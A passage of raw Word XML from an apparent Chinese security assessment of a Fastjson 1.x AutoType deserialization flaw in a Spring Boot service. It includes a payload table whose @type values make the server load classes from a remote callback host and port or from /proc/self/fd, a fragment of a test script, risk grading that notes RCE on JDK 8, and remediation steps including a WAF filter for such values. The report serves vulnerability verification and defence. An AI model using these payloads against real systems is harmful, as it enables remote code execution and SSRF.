      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>(req, timeout=8)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        print(f"  ✓ {name:20s} -&gt; HTTP {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>resp.status</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>}")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    except Exception as e:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        print(f"  ✗ {name:20s} -&gt; {e}")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br/>
        <w:t>print("\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>去</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000A79DF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:sz w:val="15"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>******</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>终端查看回调结果</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186B13AB" w14:textId="77777777" w:rsidR="00834902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步骤 4：观察回调结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDE3E91" w14:textId="11BEA033" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>回 1.12.37.40 SSH 终端，观察输出。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F132A67" w14:textId="77777777" w:rsidR="00834902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6D4E7035" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>五、Payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>对照表</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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302"/>
        <w:gridCol w:w="775"/>
        <w:gridCol w:w="2655"/>
        <w:gridCol w:w="3114"/>
        <w:gridCol w:w="1047"/>
        <w:gridCol w:w="479"/>
        <w:gridCol w:w="484"/>
      </w:tblGrid>
      <w:tr w:rsidR="00834902" w14:paraId="4262BEB8" w14:textId="77777777" w:rsidTr="008349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75338355" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>#</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54424B3D" w14:textId="77777777" w:rsidR="0083490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Payload 名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E4D4AA4" w14:textId="77777777" w:rsidR="0083490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原始 @type 值</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46352322" w14:textId="77777777" w:rsidR="0083490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转换后资源 URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F91B9F9" w14:textId="77777777" w:rsidR="0083490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端点</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14987182" w14:textId="77777777" w:rsidR="0083490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JDK 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37473901" w14:textId="77777777" w:rsidR="0083490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JDK 17+</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="46730458" w14:textId="77777777" w:rsidTr="008349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613B6D23" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000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1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FD6BED1" w14:textId="77777777" w:rsidR="0083490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http:.. 直连</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C632F5E" w14:textId="77777777" w:rsidR="0083490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http:..17573160:6111.A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="741D0203" w14:textId="77777777" w:rsidR="0083490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http://17573160:6111/A.class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17E31744" w14:textId="77777777" w:rsidR="0083490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/parse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E004E03" w14:textId="77777777" w:rsidR="0083490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✅ 回调</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6CBDBFC6" w14:textId="77777777" w:rsidR="0083490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✅ 回调</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="48CC62D8" w14:textId="77777777" w:rsidTr="0083490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457A6FB9" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000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1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="051CD830" w14:textId="77777777" w:rsidR="0083490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jar:http:.. SB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E9E63F5" w14:textId="77777777" w:rsidR="0083490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jar:http:..17573160:6111.x!.F.Exception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D6D8286" w14:textId="77777777" w:rsidR="0083490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jar:http://17573160:6111/x!/F/Exception.class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D352452" w14:textId="77777777" w:rsidR="0083490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/parse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0ABF4F3C" w14:textId="77777777" w:rsidR="0083490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✅ 回调+下载JAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="684F646C" w14:textId="77777777" w:rsidR="0083490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✅ 回调+缓存JAR</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="21A573CF" w14:textId="77777777" w:rsidTr="008349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63F8C99D" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000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1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A5B815F" w14:textId="77777777" w:rsidR="0083490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固定类型绕过</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="037F0497" w14:textId="77777777" w:rsidR="0083490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http:..17573160:6111.B（嵌套在对象中）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ADFB79F" w14:textId="77777777" w:rsidR="0083490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http://17573160:6111/B.class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33943364" w14:textId="77777777" w:rsidR="0083490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/parseObject</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57845AFE" w14:textId="77777777" w:rsidR="0083490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✅ 回调</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BA3B00C" w14:textId="77777777" w:rsidR="0083490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✅ 回调</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="725AA755" w14:textId="77777777" w:rsidTr="0083490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63588F8F" w14:textId="77777777" w:rsidR="00834902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1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5788461A" w14:textId="77777777" w:rsidR="0083490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包装对象</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="21F63587" w14:textId="77777777" w:rsidR="0083490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http:..17573160:6111.C（data字段中）</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D704CF6" w14:textId="77777777" w:rsidR="0083490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http://17573160:6111/C.class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58458029" w14:textId="77777777" w:rsidR="0083490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/user/create</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D529C67" w14:textId="77777777" w:rsidR="0083490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✅ 回调</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="654710C1" w14:textId="77777777" w:rsidR="0083490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✅ 回调</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="7FB6B447" w14:textId="77777777" w:rsidTr="008349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1AD26550" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1485643D" w14:textId="77777777" w:rsidR="0083490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FD 链探测</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C633826" w14:textId="77777777" w:rsidR="0083490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jar:file:.proc.self.fd.3!.fd3.Exception</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="656DE84A" w14:textId="77777777" w:rsidR="0083490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jar:file:/proc/self/fd/3!/fd3/Exception.class</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44753A98" w14:textId="77777777" w:rsidR="0083490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/parse</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6055BFA5" w14:textId="77777777" w:rsidR="0083490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—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1234" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54A60265" w14:textId="77777777" w:rsidR="0083490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⚠️ 条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F2F14F6" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00834902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C43DCEF" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>六、安全风险分级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34902" w14:paraId="0078D372" w14:textId="77777777" w:rsidTr="008349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27FA62D" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>JDK 版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7616CECE" w14:textId="77777777" w:rsidR="0083490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ClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6408B976" w14:textId="77777777" w:rsidR="0083490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风险等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DBFC1C1" w14:textId="77777777" w:rsidR="0083490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说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="272E7089" w14:textId="77777777" w:rsidTr="008349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6547715" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>JDK 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61694316" w14:textId="77777777" w:rsidR="0083490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Spring Boot 2.7 fat-jar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E3F7BDC" w14:textId="77777777" w:rsidR="0083490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🔴 严重</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="047F6ABC" w14:textId="77777777" w:rsidR="0083490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直接 RCE，defineClass 成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="245F5DE1" w14:textId="77777777" w:rsidTr="0083490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BA00120" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>JDK 11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0457FBCD" w14:textId="77777777" w:rsidR="0083490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Spring Boot fat-jar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E638C6A" w14:textId="77777777" w:rsidR="0083490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🟠 高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C0E870B" w14:textId="77777777" w:rsidR="0083490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SSRF 确认，defineClass 可能受限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="25D23F26" w14:textId="77777777" w:rsidTr="008349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9A15302" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>JDK 17/21</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3CFA5E80" w14:textId="77777777" w:rsidR="0083490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Spring Boot 3.2 fat-jar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C082831" w14:textId="77777777" w:rsidR="0083490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🟠 高危</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FFADBE3" w14:textId="77777777" w:rsidR="0083490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 xml:space="preserve">SSRF 确认，FD </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>链可能</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>绕过</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="4C636FD9" w14:textId="77777777" w:rsidTr="0083490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DCD6AAD" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>任意</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> JDK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C822878" w14:textId="77777777" w:rsidR="0083490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AppClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48575138" w14:textId="77777777" w:rsidR="0083490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🟢 无风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58D3B213" w14:textId="77777777" w:rsidR="0083490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不解析 HTTP URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1DC6B5B8" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00834902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B361E2C" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t>本次验证目标为 JDK 21 + Spring Boot 3.2 fat-jar，已确认存在 HTTP 回调（SSRF），风险等级评定为高危。同一漏洞在 JDK 8 + Spring Boot 2.7 环境下可直接完成 RCE。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16305F05" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B9FEFC" w14:textId="77777777" w:rsidR="00834902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七、修复建议</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7277DDEA" w14:textId="77777777" w:rsidR="00834902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7.1 立即措施（当天完成）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307"/>
        <w:gridCol w:w="1819"/>
        <w:gridCol w:w="5730"/>
      </w:tblGrid>
      <w:tr w:rsidR="00834902" w14:paraId="40FDA759" w14:textId="77777777" w:rsidTr="008349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B894813" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>优先级</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C9EFAA9" w14:textId="77777777" w:rsidR="0083490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措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A0305AD" w14:textId="77777777" w:rsidR="0083490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操作方式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="6EB4C981" w14:textId="77777777" w:rsidTr="008349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E09D194" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>🔴 紧急</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39BA0936" w14:textId="77777777" w:rsidR="0083490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启用 Fastjson SafeMode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31002C6B" w14:textId="77777777" w:rsidR="0083490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代码：ParserConfig.getGlobalInstance().setSafeMode(true);</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>或 JVM 参数：-Dfastjson.parser.safeMode=true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="23D1AFC0" w14:textId="77777777" w:rsidTr="0083490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8A34264" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>🔴 紧急</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A36B8CB" w14:textId="77777777" w:rsidR="0083490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迁移 Fastjson 2.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2880" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="405BFBA5" w14:textId="77777777" w:rsidR="0083490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替换为 com.alibaba.fastjson2:fastjson2，重新验证多态类型和 AutoType 配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3E50252D" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00834902">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23AF13AE" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
        </w:rPr>
        <w:t>7.2 短期措施（本周完成）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834902" w14:paraId="6811C5EC" w14:textId="77777777" w:rsidTr="008349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E92B602" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D5D1C41" w14:textId="77777777" w:rsidR="0083490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说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="34AB038F" w14:textId="77777777" w:rsidTr="008349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CE2E68C" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>出站网络收敛</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77B34D57" w14:textId="77777777" w:rsidR="0083490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禁止业务 JVM 对非必要外部地址发起 HTTP/HTTPS 连接</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834902" w14:paraId="0B948D91" w14:textId="77777777" w:rsidTr="0083490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FB44FA8" w14:textId="77777777" w:rsidR="00834902" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">WAF </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>规则</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4320" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6360972D" w14:textId="77777777" w:rsidR="0083490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拦截 JSON 中 @type 值包含 http:、jar:、file:、.. 的请求</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
